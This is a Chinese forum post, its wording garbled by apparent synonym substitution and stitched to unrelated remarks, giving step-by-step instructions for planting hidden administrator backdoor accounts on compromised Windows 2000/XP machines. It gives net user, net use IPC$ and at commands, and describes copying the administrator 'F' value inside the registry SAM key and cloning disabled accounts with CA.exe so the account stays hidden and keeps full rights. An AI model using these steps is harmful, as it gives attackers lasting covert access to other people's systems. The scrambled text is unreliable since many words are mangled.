|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
只要你想学,就没什么优缺点,上面那位大哥已经把网上的评论说了,但我认为想学哪个都一样,不然它就不可能在当今时代数字艺术方面存活到今天1、怎样在图形界面创建埋没的超等用户
图形界面下合用当地或开3389终端服务的肉鸡上。下面我提到的那位作者说的办法很好,可是较为庞大,还要用到psu.exe(让程序以体系用户身份运转的程序),假如在肉鸡上的话还要上传psu.exe。我说的这个办法将不必到psu.exe这个程序。由于windows2000有两个注册表编纂器:regedit.exe和regedt32.exe。XP中regedit.exe和regedt32.exe实为一个程序,修正键值的权限时在右键中点“权限”来修正。对regedit.exe我想人人都很熟习,但却不克不及对注册表的项键设置权限,而regedt32.exe最年夜的长处就是可以对注册表的项键设置权限。nt/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINESAMSAM键下,可是除体系用户SYSTEM外,别的用户都无权检察到内里的信息,因而我起首用regedt32.exe对SAM键为我设置为“完整把持”权限。如许就能够对SAM键内的信息举行读写了了。详细步聚以下:
1、假定我们是以超等用户administrator登录到开有终端服务的肉鸡上的,起首在命令行下或帐户办理器中创建一个帐户:hacker$,这里我在命令行下创建这个帐户
netuserhacker$1234/add
2、在入手下手/运转中输出:regedt32.exe并回车来运转regedt32.exe。
3、点“权限”今后会弹出窗口
点增加将我登录时的帐户增加到平安栏内,这里我是以administrator的身份登录的,以是我就将administrator到场,并设置权限为“完整把持"。这里必要申明一下:最好是增加你登录的帐户或帐户地点的组,切莫修正原本的帐户或组,不然将会带来一系列不用要的成绩。等埋没超等用户建好以,再来这里将你增加的帐户删除便可。
4、再点“入手下手”→“运转”并输出"regedit.exe"回车,启动注册表编纂器regedit.exe。
翻开键:HKEY_LOCAL_MAICHINESAMSAMDomainsaccountusernameshacker$"
5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg,用记事天职别打这几个导出的文件举行编纂,将超等用户对应的项000001F4下的键"F"的值复制,并掩盖hacker$对应的项00000409下的键"F"的值,然后再将00000409.reg与hacker.reg兼并。
6、在命令行下实行netuserhacker$/del将用户hacker$删除:netuserhacker$/del
7、在regedit.exe的窗口内按F5革新,然后打文件-导进注册表文件将修正好的hacker.reg导进注册表便可
8、到此,埋没的超等用户hacker$已建好了,然后封闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINESAMSAM键权限改回本来的模样(只需删除增加的帐户administrator便可)。
9、注重:埋没的超等用户建好后,在帐户办理器看不到hacker$这个用户,在命令行用“netuser”命令也看不到,可是超等用户创建今后,就不克不及再改暗码了,假如用netuser命令来改hacker$的暗码的话,那末在帐户办理器中将又会看这个埋没的超等用户了,并且不克不及删除。
怎样在命令行下远程创建埋没的超等用户
在这里将用at的命令,由于用at发生的企图义务是以体系身份运转的,以是也用不到psu.exe程序。为了可以利用at命令,肉鸡必需开有schedule的服务,假如没有开启,可用流光里带的工具netsvc.exe或sc.exe来远程启动,固然其办法也能够,只需能启动schedule服务就行。
关于命令行体例,你能够接纳各类毗连体例,如用SQLexec毗连MSSQL的1433端口,也能够用telnet服务,只需以你能失掉一个cmdshell,而且有运转at命令的权限就能够。
1、起首找到一台肉鸡,至于怎样来找那不是我这里所说的话题。这里先假定找到一台超等用户为administrator,暗码为12345678的肉鸡,如今我们入手下手在命令行下远程为它创建埋没的超等用户。(例子中的主机是我的局域网内的一台主机,我将它的ip地点改成13.50.97.238,,请勿在互联网上对号入坐,以避免骚扰一般的ip地点。)
2、先与肉鸡创建毗连,命令为:netuse13.50.97.238ipc$"12345678"/user:"administrator
3、用at命令在肉鸡上创建一个用户(假如at服务没有启动,可用小榕的netsvc.exe或sc.exe来远程启动):at13.50.97.23812:51
c:winntsystem32net.exeuserhacker$1234/add
创建这个加有$符的用户名,是由于加有$符后,命令行下用netuser将不显现这个用户,但在帐户办理器却能看到这个用户。
4、一样用at命令导出HKEY_LOCAL_MACHINEsamsamDomainsaccountusers下键值:at13.50.97.23812:55
c:winntregedit.exe/ehacker.regHKEY_LOCAL_MACHINESAMSAMDomainsaccountusers
/e是regedit.exe的参数,在_LOCAL_MACHINESAMSAMDomainsaccountusers这个键的必定要以开头。需要的情形下能够用引号将"c:winntregedit.exe/ehacker.regHKEY_LOCAL_MACHINESAMSAMDomainsaccountusers"引发来。
5、将肉鸡上的hacker.reg下载到本机上用记事本翻开举行编纂命令为:copy13.50.97.238admin$system32hacker.reg
c:hacker.reg
修正的办法图形界中已先容过了,这里就不作先容了。
6、再将编纂好的hacker.reg拷回肉鸡上copyc:hacker.reg13.50.97.238admin$system32hacker1.reg
7、检察肉鸡工夫:nettime13.50.97.238然后用at命令将用户hacker$删除:
at13.50.97.23813:40netuserhacker$/del
8、考证hacker$是不是删除:用
netuse13.50.97.238/del断开与肉鸡的毗连。
netuse13.50.97.238ipc$"1234"/user:"hacker$"用帐户hacker$与肉鸡毗连,不克不及毗连申明已删除。
9、再与肉鸡创建毗连:netuse13.50.97.238ipc$"12345678"/user:"administrator"
再获得肉鸡工夫,用at命令将拷回肉鸡的hacker1.reg导进肉鸡注册表:
at13.50.97.23813:41c:winntregedit.exe/shacker1.reg
regedit.exe的参数/s是指宁静形式。
10、再考证hacker$是不是已创建,办法同下面考证hacker$是不是被删除一样。
11、再考证用户hacker$是不是有读、写、删的权限,假如不宁神,你还可考证是不是能创建别的帐户。
12、经由过程11能够判定用户hacker$具有超等用户权限,由于最后我用at命令创建它的时分是一个一般用户,而如今却具有远程读、写、删的权限。
3、假如肉鸡没有开3389终端服务,而我又不想用命令行,怎样办?
这类情形下,你也能够用界面体例来远程为肉鸡创建埋没的超等用户。由于regedit.exe、regedt32.exe都有毗连收集注册表的功效,你能够用regedt32.exe来为远程主机的注册表项设置权限,用regedit.exe来编纂远程注册表。帐户办理器也有一项连另外一台盘算机的功效,你能够用帐户办理器为远程主机创建和删除帐户。详细步聚与下面先容的类似,我就未几说了,只它的速率其实是使人难以忍耐。
可是这里有两个条件:1、先用netuse肉鸡ipipc$"暗码"/user:"超等用户名"来与远程主机创建毗连今后,才干用regedit.exeregedt32.exe及帐户办理器与远程主机毗连。
2、远程主机必需开启远程注册表服务(没有开启的话,你也能够远程开启,由于你有超等用户的暗码了)。
4、使用被禁用的帐户创建埋没的超等用户:
我们能够用肉鸡上被克制的用户来创建埋没的超组用户.办法以下:
1.想举措检察有哪些用户被仔细的办理员克制,一样平常情形下,有些办理员出于平安思索,一般会将guest禁用,固然了会禁用别的用户。在图形界面下,十分简单,只需在帐户办理器中就能够看到被禁用的帐户上有一个红叉;而在命令行下,我还没有想到好的举措,只能在命令行下用命令:"netuser用户名"一个一个来检察用户是不是被禁用。
2.在这里,我们假定用户hacker被办理员禁用。起首,我先用小榕的超组用户克隆程序CA.exe,将被禁用的用户hacker克隆成超等用户(克隆以后,被禁用的用户hacker就会主动被激活了):CA.EXE肉鸡ipAdministrator超等用户暗码hacherhacher暗码。
3.假如你如今一个cmdshell,如使用telnet服务或SQLEXEC毗连肉鸡的msSQL的默许端口1433失掉的shell都能够,这时候你只需输出命令:
netuserhacker/active:no如许用户hacker就被禁用了(最少外表上是如许的),固然你也能够将用户hacher换成别的的被禁用的用户。
4.这时候假如你在图形界面下看帐户办理器中的用户时,会发明用户hacker被禁用了,但现实上是如许的吗?你用这个被禁用的用户毗连一下肉鸡看看是不是能连上?用命令:netuser肉鸡ipipc$"hacker暗码"/user:"hacker"连连续看看。我能够告知人人,经由我屡次实验,次次都能乐成,并且仍是超等用户权限。
5.假如没有cmdshell怎样办?你能够我下面先容的at命令来禁用用户hacker;命令格局:at肉鸡ip工夫netuserhacker/active:no
6.道理:详细的深邃的道理我也说不下去,我只能从最复杂的说。你先在图形界面下在帐户办理器中禁用一下超等用户administrator看看,一定会弹出一对话框,并克制你持续禁用超等用户administrator,一样,由于在克隆时,hacker在注册表的"F"键被超等用户administrator在注册表的"F"键所替换,因此hacker就具有了超等用户的权限了,可是因为hacker在注册表内"C"健仍是本来的"C"键,以是hacker仍是会被禁用,可是它的超等用户权限却不会被禁用,因而被禁用的用户hacker仍是能够毗连肉鸡,并且还具有超等用户的权限。详细我也说不分明,人人姑且这么了解吧。
5、注重的几点事项:
1、埋没的超等用户创建今后,在帐户办理器中和命令行下均看不到这个用户,但这个用户却存在。
2、埋没的超等用户创建今后,就不克不及再修正暗码了,由于一旦修正暗码,这个埋没的超等用户就会表露在帐户办理器中,并且不克不及删除。
3、如在本机上实验时,最好用体系自带的备份工具先备份好本机的“体系形态”次要是注册表的备份,由于自己做实验时,曾呈现过帐户办理器中看不就任何用户,组中也看不就任何组的征象,但它们却存在。幸亏我有备份,呵呵。SAM键是究竟体系最敏感的部位。
4、本办法在2000/XP上测试经由过程,未在NT上测试。本办法仅供研讨,请勿将本办法用于损坏上,使用本办法形成严峻成果者,由利用者卖力,自己概不卖力
大家可以自己去看一看.可以说看得想呕吐.以前有次下了个动网来看.里面连基本内置函数的保护措施(函数没防御性)都没有.难怪经常补这个补那个了.可能现在.NET版会好点吧 |
|